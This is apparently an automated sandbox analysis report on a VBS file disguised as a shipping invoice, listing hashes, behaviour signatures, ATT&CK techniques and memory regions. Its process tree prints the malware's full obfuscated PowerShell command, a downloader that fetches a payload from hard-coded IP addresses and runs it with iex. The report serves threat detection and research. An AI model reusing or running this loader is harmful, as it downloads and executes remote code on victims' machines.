Analysis

  • max time kernel
    147s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-06-2024 03:13

General

  • Target

    doc_pl_invoice_awb_988-02403026_062024_00000000.vbs

  • Size

    187KB

  • MD5

    c94c793ce09afaf08a2a3f90f91d447e

  • SHA1

    1cc82e99bd159f2360ae3e56ede43a14e81073a2

  • SHA256

    9362977cfd09e8e32bd857225fd08aeae9f8dd75a241bc63e454c762c5a480ce

  • SHA512

    d89fdc8efceacc857336b23896487259d33a9539b0f79077482a97017c3413da13b4a795f1bedbdd118b6ed089b839beae7d122c95884eb5b02b24585168b0d3

  • SSDEEP

    3072:vmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZZ:v08GxbKja3+DCbKCvBB/WnHXC/sLJFJG

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc_pl_invoice_awb_988-02403026_062024_00000000.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4648
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes Baglygtes Apositia147 stolthed Nuculania Bantamvgtsbokserne Tjenesteydelses Syringomyelic Tua Intergenerative Basisuddannelses Togae Nomotheism Suffixer Skanderedes Purportedly Ampulliform Seksuelt174 Infraclavicle Rumstation Cesaro Blyantstregernes40 Monoton Bogbinderiers Bragedes';$Ansgningerne = 1;Function Kompromitterendes($Skelligartede){$Dekreters=$Skelligartede.Length-$Ansgningerne;$Sandpits='SUBSTRIN';$Sandpits+='G';For( $Arbejdsmssig=1;$Arbejdsmssig -lt $Dekreters;$Arbejdsmssig+=2){$Baglygtes+=$Skelligartede.$Sandpits.Invoke( $Arbejdsmssig, $Ansgningerne);}$Baglygtes;}function Hekseskud($Peliosis){ & ($gennemarbejdes) ($Peliosis);}$Ungamboled=Kompromitterendes 'IMWo zDi lVlPad/F5 .N0N N(jWfiFnGdAoPw,sI N.TO 1A0,. 0 ; W iUn.6.4B;l xB6F4B; ,r v.:r1F2D1...0D)F .Gwe c kDoM/S2 0 1 0E0L1,0 1C HF i rBe.f o x /,1T2,1D. 0R ';$Kardan=Kompromitterendes 'SU s.e r -CA g eFnLt. ';$Bantamvgtsbokserne=Kompromitterendes '.h tHt pa: /C/B1G9 4l..5,9s. 3 1 .F1,3D7S/Sk y sA.DsVnFpM> hLtFtTpT:V/S/E9H4 . 1O5 6U. 8..,8.8./Uk y.s .Ss.nBpI ';$Vader=Kompromitterendes 'B> ';$gennemarbejdes=Kompromitterendes ' i.eBx ';$Echinococcosis='Tua';$Kloakerende = Kompromitterendes 'SeBc h oU ,% aKpKp dTa t.a % \,TEr.o.sUfUrVi h e.d.eLnI. UTnGdS S&,& IeAcChBot t ';Hekseskud (Kompromitterendes '.$CgWlToPbMaAl :EF o,rem.i cAa,rOoUiCdM=.(Ic m d / cN S$GK l o aRkee rUe.nmd.eT). ');Hekseskud (Kompromitterendes 'H$ g,lVo bPa lV:TN u cAu lCaFnPi,a =S$ B a.nNtMa mUv g t s.bToKk,s e,r,nLeS.Rs p,lSiPt (t$KVSaUd.e r )N ');Hekseskud (Kompromitterendes ' [ NRe tO. Sde r v iTcSe P,oFiUnUtSMKa,nkaTg,e r.] :F: SSe,c.u,rAi tUyEP r.o tRoocDo l =P U[DN.e.t . SSe.c uPrDi t y PVrSo tBo c o lCT ybp,eS]A:E:.TtlFs 1H2W ');$Bantamvgtsbokserne=$Nuculania[0];$Contempts= (Kompromitterendes ' $ g lBoHb a.l,:.SSwKo.r,dDfUiIs h eLs = N e,w - O bGj e c,tO SS.ySsBt e.mS.BNUe.t . W e bIC l,i,e.n t');$Contempts+=$Formicaroid[1];Hekseskud ($Contempts);Hekseskud (Kompromitterendes ' $cS wsomrBd f i,s.h,e,sL.AHae aFdUeAr s [.$IKFa rSd,a.n,]A=S$SUDnEgVa m.bAo.lGeOd ');$Reddendum=Kompromitterendes ' $FSZw.oWrId,fDiKs hKe s . D o w nVl.oOaAdHFTi l,eT(.$ BRa n tTaMmBv gBtVsCb oMkRsSeUr nCeN,A$vM o,nfo tFo nG) ';$Monoton=$Formicaroid[0];Hekseskud (Kompromitterendes 'P$,g l oAbNa,l :.STe lStSe r =S(ST.e s,tB- PEaHtphF ,$ MBo.n o,tOo nS) ');while (!$Selter) {Hekseskud (Kompromitterendes 'h$CgDlao,bAa.l :HH eApJt a.c.oFlSiLc.=r$ t rLuEe ') ;Hekseskud $Reddendum;Hekseskud (Kompromitterendes '.SDtSa.r t -US l,eLe pg C4R ');Hekseskud (Kompromitterendes '.$Ag,l,oCb a lM:FSEeHl t.eLrI=S(PT eFsRtB- PRa.t hL $AMRo,nMoCtEo.n )u ') ;Hekseskud (Kompromitterendes ' $ g.l oAb,aSl,:,s tAo lOt h e d,=M$ gnl,oPb awlS:WA,pRo,s.iAtHiTa.1T4k7e+ +,% $TN u cBuOl aMnBiGa . cGoDu n t, ') ;$Bantamvgtsbokserne=$Nuculania[$stolthed];}$Impulsing109=335650;$oppede=26343;Hekseskud (Kompromitterendes 'T$SgFlIoLbia l :PIPnPt eFr gIe,n e rIaNt.iDvBeH T=T FG eAth-.C o,n t e.n,tb I$.M.oAnEo,tSo nS ');Hekseskud (Kompromitterendes 'C$ gDl oRbYaBlA:CACnUh n,gUeNr eAs. A=C C[PSOy,s t e m .DC o.navBeErRtB]P:H: FDr,o mRB,aBsGeD6N4 S t,rSiCn g (E$.I nEt.e,rDg,e nUeMrsaTtPiavYe )C ');Hekseskud (Kompromitterendes ' $BgKl oLb.aUlS:AN,orm ost hSe.iTsPm S=R W[LS y.sItNe mK. TAe x,tf.LESnVcAo dCiBn.g ] : :SASS.CTI IB..GAeWtISMt r i,n g.(,$BAAn.hSn gTeSrOe s )U ');Hekseskud (Kompromitterendes ',$Ig laoSbraSlD:CC oMlToGrUipfNiBcs6D= $SN,oKm o.t hPeKi sUmO. s.ucb,s tIrsiAngg (B$.ITm.pSu,l,sNi,noge1 0M9,,B$UoMpSpDeAd e ) ');Hekseskud $Colorific6;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trosfriheden.Und && echo t"
        3⤵
          PID:1184

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ik3yeztg.sj2.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2280-0-0x00007FF8EE8C3000-0x00007FF8EE8C5000-memory.dmp
      Filesize

      8KB

    • memory/2280-11-0x00007FF8EE8C0000-0x00007FF8EF381000-memory.dmp
      Filesize

      10.8MB

    • memory/2280-10-0x000001D57B1C0000-0x000001D57B1E2000-memory.dmp
      Filesize

      136KB

    • memory/2280-12-0x00007FF8EE8C0000-0x00007FF8EF381000-memory.dmp
      Filesize

      10.8MB

    • memory/2280-13-0x00007FF8EE8C3000-0x00007FF8EE8C5000-memory.dmp
      Filesize

      8KB

    • memory/2280-14-0x00007FF8EE8C0000-0x00007FF8EF381000-memory.dmp
      Filesize

      10.8MB

    • memory/2280-15-0x00007FF8EE8C0000-0x00007FF8EF381000-memory.dmp
      Filesize

      10.8MB

    • memory/2280-16-0x00007FF8EE8C0000-0x00007FF8EF381000-memory.dmp
      Filesize

      10.8MB